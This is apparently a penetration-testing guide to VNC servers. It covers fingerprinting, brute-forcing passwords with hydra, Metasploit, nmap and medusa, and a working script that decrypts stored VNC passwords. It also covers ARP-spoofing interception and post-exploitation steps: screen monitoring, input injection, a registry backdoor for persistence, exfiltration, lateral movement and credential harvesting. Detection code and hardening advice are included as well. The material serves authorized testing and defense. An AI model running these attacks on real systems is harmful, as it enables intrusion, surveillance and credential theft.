VNC - Port 5800/5801/5900/5901

Basic info

VNC (Virtual Network Computing) uses the RFB protocol to share desktops remotely. It transmits framebuffer updates and input events. Many implementations (TightVNC, RealVNC, TigerVNC) differ in auth and cipher support; older implementations still rely on an outdated VNC password format (DES/3DES) that can be trivially recovered.

  • Default ports: 5900/5901 (RFB/VNC) and 5800/5801 (HTTP gateway to VNC).

  • Common issues: default/weak passwords, unauthenticated or misconfigured viewers, legacy 3DES-encrypted .vnc passwords, and open management interfaces.

  • Defender quick wins: block VNC ports at the perimeter, force modern authentication (VPN/SSH tunnel + ACLs), rotate creds and disable empty passwords.

Weak or Default Passwords

Test common default VNC passwords for unauthorized access.

# Common VNC passwords
password
12345678
vnc123
admin
administrator

# Try with vncviewer
vncviewer target.com:5900
# Enter password when prompted

Quick Fingerprinting & Discovery

# scan common ports
nmap -sV -Pn -p5900,5901,5800,5801 --script vnc-info,vnc-title,realvnc-auth-bypass <IP>

# web gateway check
curl -I http://<ip>:5800/  # some servers expose a web-based VNC viewer

Shodan search: port:5900 product:VNC or RFB.


Enumeration (manual & automated)

Nmap scripts (vnc-info, vnc-title, realvnc-auth-bypass) reveal server banners, version, supported auth mechanisms and sometimes negotiation failures.

Metasploit auxiliary scanner:

msf> use auxiliary/scanner/vnc/vnc_none_auth
msf> set RHOSTS <target>
msf> run

Python example (basic handshake):

import socket

host = "target.com"  # VNC server to fingerprint
s = socket.create_connection((host, 5900), timeout=5)
print(s.recv(1024))  # the server speaks first: its ProtocolVersion message
s.close()

This shows the RFB protocol version string (e.g., RFB 003.003).
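The snippet above stops at the version banner. The following added example (my own code, not taken from the original page or from any VNC project) goes one message further and decodes the server's SecurityTypes message in both the 3.3 form (a single U32) and the 3.7/3.8 form (U8 count plus a list, or a reason string on failure), then flags weak offerings the way an auditor of their own servers would want. The `probe` helper, the type-name table (a subset of the RFC 6143 / IANA registry) and the byte strings used as input are assumptions made for illustration.

```python
import socket
import struct

# Subset of RFB security types (RFC 6143 and the IANA registry)
SECURITY_TYPES = {
    0: "Invalid (connection failed)",
    1: "None (no authentication!)",
    2: "VNC Authentication (legacy DES challenge)",
    16: "Tight",
    17: "Ultra",
    18: "TLS",
    19: "VeNCrypt",
    20: "GTK-VNC SASL",
}


def parse_version(banner: bytes):
    """Parse the 12-byte 'RFB xxx.yyy\\n' ProtocolVersion message into (major, minor)."""
    if len(banner) < 12 or not banner.startswith(b"RFB "):
        raise ValueError("not an RFB ProtocolVersion message")
    return int(banner[4:7].decode()), int(banner[8:11].decode())


def parse_security_types(minor: int, data: bytes):
    """Decode the server's security-type message for the negotiated minor version.

    3.3: one big-endian U32 security type.
    3.7/3.8: U8 count followed by `count` U8 types; a count of 0 means failure and
    is followed by a U32 length and a reason string.
    Returns (list_of_types, reason_or_None)."""
    if minor == 3:
        (stype,) = struct.unpack("!I", data[:4])
        return [stype], None
    count = data[0]
    if count == 0:
        (reason_len,) = struct.unpack("!I", data[1:5])
        return [], data[5:5 + reason_len].decode("latin-1", "replace")
    return list(data[1:1 + count]), None


def describe(types):
    """Human-readable names for the offered types."""
    return [SECURITY_TYPES.get(t, f"unknown ({t})") for t in types]


def assess(types):
    """Defender view: list the weaknesses implied by the offered types."""
    findings = []
    if 1 in types:
        findings.append("no-auth offered")
    if 2 in types:
        findings.append("legacy VNC auth offered")
    if not any(t in (18, 19, 20) for t in types):
        findings.append("no TLS/VeNCrypt/SASL type offered")
    return findings


def probe(host, port=5900, timeout=5):
    """Live check of one server: speak the first two RFB messages and return
    ((major, minor), offered_types, failure_reason). Assumed helper, not a library API."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        major, minor = parse_version(s.recv(12))
        chosen = 3 if minor < 7 else min(minor, 8)  # pick the highest version we handle
        s.sendall(b"RFB 003.%03d\n" % chosen)
        types, reason = parse_security_types(chosen, s.recv(256))
    return (major, minor), types, reason


if __name__ == "__main__":
    # Constructed 3.8 SecurityTypes message: two types, VNC Authentication and VeNCrypt
    offered, _ = parse_security_types(8, b"\x02\x02\x13")
    print(describe(offered), assess(offered))
```

A server that offers only types 18/19/20 still needs checking that the VeNCrypt or TLS sub-type actually enforces a certificate and a password; this parser only tells you which top-level mechanisms are on the table.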


Authentication & Brute Force

  • Many boxes still use weak passwords or guest accounts. Test with a targeted credential list rather than noisy wordlists. Tools: hydra, ncrack, vncclient scripts.

  • VNC password storage: local VNC server password files (e.g., ~/.vnc/passwd) use an old 8‑byte password format encrypted with a fixed DES key; tools like vncpwd (https://github.com/jeroennijhof/vncpwd) can recover plaintext easily.

Using Hydra

hydra -P /usr/share/wordlists/rockyou.txt vnc://target.com

Using Metasploit

use auxiliary/scanner/vnc/vnc_login
set RHOSTS target.com
set PASS_FILE passwords.txt
run

Using Nmap

nmap -p 5900 --script vnc-brute --script-args passdb=passwords.txt target.com

Using Medusa

medusa -h target.com -u "" -P passwords.txt -M vnc

Password Decryption

Exploit VNC's weak password encryption for credential recovery.

# VNC password locations
~/.vnc/passwd
C:\Users\username\.vnc\passwd
C:\Program Files\RealVNC\vncserver.ini

# Decrypt VNC password
vncpwd /path/to/passwd

# Using Python script (needs pycryptodome: pip install pycryptodome)
python3 << 'EOF'
from Crypto.Cipher import DES

# Read the stored password: a single 8-byte DES-ECB block
with open('.vnc/passwd', 'rb') as f:
    encrypted = f.read(8)

# Fixed key as VNC's d3des uses it; standard DES libraries expect each key
# byte bit-reversed, so convert before use
key = [0x17, 0x52, 0x6b, 0x06, 0x23, 0x4e, 0x58, 0x07]
std_key = bytes(int(f'{b:08b}'[::-1], 2) for b in key)
password = DES.new(std_key, DES.MODE_ECB).decrypt(encrypted)
print(password.rstrip(b'\x00').decode('latin-1'))
EOF

Brute-force:

vncviewer -passwd passwd.txt <IP>::5901
# -passwd expects an encrypted VNC passwd file, not a wordlist; for wordlist attacks use hydra's vnc module (above)

Extracting VNC password from files (staging/forensics only):

# build vncpwd and run against ~/.vnc/passwd
git clone https://github.com/jeroennijhof/vncpwd.git
cd vncpwd && make
./vncpwd ~/.vnc/passwd

Man-in-the-Middle Attack

Intercept VNC traffic for credential theft and session hijacking.

# Using Ettercap
ettercap -T -M arp:remote /target-ip// /gateway-ip//

# Capture VNC traffic with Wireshark
# Filter: tcp.port == 5900

# Extract VNC password from captured traffic
# Password is DES encrypted with known key

Post‑Exploitation

After successful VNC access you can collect intelligence, maintain access, and move laterally. Only perform these actions in environments you own or have explicit permission to test.

Screen Capture

Capture screenshots of the remote desktop for reconnaissance and data collection.

# Using vncsnapshot
vncsnapshot target.com:5900 screenshot.jpg

# Using vncdo
vncdo -s target.com:5900 capture screenshot.png

# Continuous monitoring (staging/testing only)
while true; do
  vncsnapshot target.com:5900 screen_$(date +%s).jpg
  sleep 60
done

Keylogging and Input Injection

Inject keyboard and mouse inputs to execute commands or access sensitive information. Use vncdo for scripted interactions.

# Send a key sequence or type text
vncdo -s target.com:5900 key cmd
vncdo -s target.com:5900 type "whoami"
vncdo -s target.com:5900 key enter

# Open Run dialog (Windows)
vncdo -s target.com:5900 key win-r
sleep 1
vncdo -s target.com:5900 type "cmd"
vncdo -s target.com:5900 key enter

Notes: avoid long-running keyloggers on production; prefer snapshot-and-review techniques and show captured evidence to stakeholders.

Persistence

Create persistent backdoor access to compromised VNC systems (testing only). On Windows you can create auto-start registry entries or scheduled tasks via the GUI or command shell.

# Example manual GUI flow (Windows):
# 1. Open Run (Win+R)
# 2. Type: regedit
# 3. Navigate to: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
# 4. Create new value with path to backdoor executable or script

# Or via command injection through VNC Run -> cmd -> execute commands (be cautious)

Data Exfiltration

Extract sensitive data from compromised VNC sessions.

# Use VNC clipboard (if enabled): copy data in session and paste locally
# Use file sharing: copy files to a shared location accessible to attacker
# Screenshot sensitive data:
vncsnapshot target.com:5900 sensitive_data.jpg

If clipboard and file sharing are disabled, use screenshots and manual copy/paste via the VNC channel.

Lateral Movement

Use credentials or discovery performed in the VNC session to move to other systems.

# From VNC-opened shell (Windows)
ipconfig /all
# or Linux
ifconfig
# scan internal network (use nmap carefully in production)
nmap -sT -p 22,3389,5900 --open 10.0.0.0/24

Use discovered credentials to attempt logins to other VNC servers or services. Abuse saved credentials in browsers or config files when found.

Credential Harvesting

Look for browser password managers, config files, and application logs containing secrets.

# Browser: open browser, navigate to passwords section or export (if available)
# Files: check common app config paths for plaintext credentials
# Keylogging: monitor keyboard input during authentication to capture passwords (use ethically)

Reminder: harvesting credentials must be authorized and documented; never exfiltrate PII unless part of agreed scope.


Hardening & Defender Playbook

Network controls

  • Do not expose VNC ports to the internet. Require SSH tunnels or corporate VPN for remote access. Block 5900-5901, 5800-5801 on perimeter firewalls.

Authentication

  • Disable empty passwords and legacy auth. Use viewers that support strong authentication (SASL/GSSAPI) or use OS-level auth instead (e.g., RDP with NLA on Windows). Use per-user credentials and rotate them.

Encryption & tunnels

  • VNC’s native encryption is weak in many implementations. Require SSH or stunnel to protect RFB traffic, or use a VPN. If the web gateway (5800) is enabled, place it behind authentication and TLS.

File hygiene

  • Protect ~/.vnc/passwd and do not store clear-text credentials in scripts. Use OS keyrings or secrets managers instead.

Monitoring & Detection

  • Alert on inbound connections to VNC ports from unusual IPs. Log new viewer sessions and their durations. Watch for multiple failed auth attempts.
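To make the "unusual IPs" and "multiple failed auth attempts" rules concrete, here is an added example (my own code, not from the original page) that runs a sliding-window failure counter and an allow-list check over a few constructed log lines. The log format and the `vncserver:` tag are assumptions (TigerVNC, x11vnc and RealVNC each log differently, so adapt the regex to your server), as are the 10.0.0.0/24 admin subnet and the threshold of 5 failures in 5 minutes.

```python
import ipaddress
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample lines in an assumed syslog-like shape (not a real server's format)
SAMPLE_LOG = """\
2024-05-01T10:00:01Z vncserver: connection accepted from 10.0.0.15:50211
2024-05-01T10:00:03Z vncserver: auth success from 10.0.0.15:50211
2024-05-01T10:01:10Z vncserver: connection accepted from 203.0.113.7:41002
2024-05-01T10:01:11Z vncserver: auth failure from 203.0.113.7:41002
2024-05-01T10:01:12Z vncserver: auth failure from 203.0.113.7:41003
2024-05-01T10:01:13Z vncserver: auth failure from 203.0.113.7:41004
2024-05-01T10:01:14Z vncserver: auth failure from 203.0.113.7:41005
2024-05-01T10:01:15Z vncserver: auth failure from 203.0.113.7:41006
2024-05-01T10:30:00Z vncserver: auth failure from 10.0.0.22:51000
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+) vncserver: (?P<event>connection accepted|auth success|auth failure) "
    r"from (?P<ip>[0-9.]+):(?P<port>\d+)$"
)

# Assumed allow-list: the admin subnet used in the ufw rules of this section
ADMIN_NETS = [ipaddress.ip_network("10.0.0.0/24")]


def parse_line(line):
    """Return (timestamp, event, ip) for a matching line, else None."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    ts = datetime.strptime(m["ts"], "%Y-%m-%dT%H:%M:%SZ")
    return ts, m["event"], m["ip"]


def is_allowed_source(ip):
    """True when the source address falls inside one of the admin networks."""
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in ADMIN_NETS)


def detect(log_text, threshold=5, window=timedelta(minutes=5)):
    """Emit ('unusual_source', ip) for a connection from outside ADMIN_NETS and
    ('bruteforce', ip) once an IP reaches `threshold` failures inside `window`.
    Each alert fires at most once per IP, in the order it was detected."""
    alerts = []
    fired = set()
    failures = defaultdict(deque)  # ip -> timestamps of recent failures
    for line in log_text.splitlines():
        parsed = parse_line(line)
        if parsed is None:
            continue
        ts, event, ip = parsed
        if event == "connection accepted" and not is_allowed_source(ip):
            if ("unusual_source", ip) not in fired:
                fired.add(("unusual_source", ip))
                alerts.append(("unusual_source", ip))
        elif event == "auth failure":
            q = failures[ip]
            q.append(ts)
            while q and ts - q[0] > window:  # drop failures that fell out of the window
                q.popleft()
            if len(q) >= threshold and ("bruteforce", ip) not in fired:
                fired.add(("bruteforce", ip))
                alerts.append(("bruteforce", ip))
    return alerts


if __name__ == "__main__":
    for kind, ip in detect(SAMPLE_LOG):
        print(f"ALERT {kind}: {ip}")
```

The single failure from 10.0.0.22 is inside the admin subnet and below the threshold, so it produces nothing; the burst from 203.0.113.7 trips both rules. Feeding this the live log (or its SIEM equivalent) is what turns the bullet above into an actual alert.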

Quick firewall commands:

# ufw evaluates rules in order and the first match wins, so add the admin allow before the deny
ufw allow proto tcp from 10.0.0.0/24 to any port 5900:5901
ufw deny proto tcp from any to any port 5900:5901
ufw deny proto tcp from any to any port 5800:5801

Common Pitfalls & Remediation

  • Mistake: Relying on built-in VNC encryption — it may be disabled or weak. Fix: Enforce SSH/VPN tunnels.

  • Mistake: Using default or shared passwords for support accounts. Fix: Enforce per-user credentials and periodic rotation.

  • Mistake: Leaving web gateway (5800) publicly accessible. Fix: Require web auth, TLS, and restrict by IP.

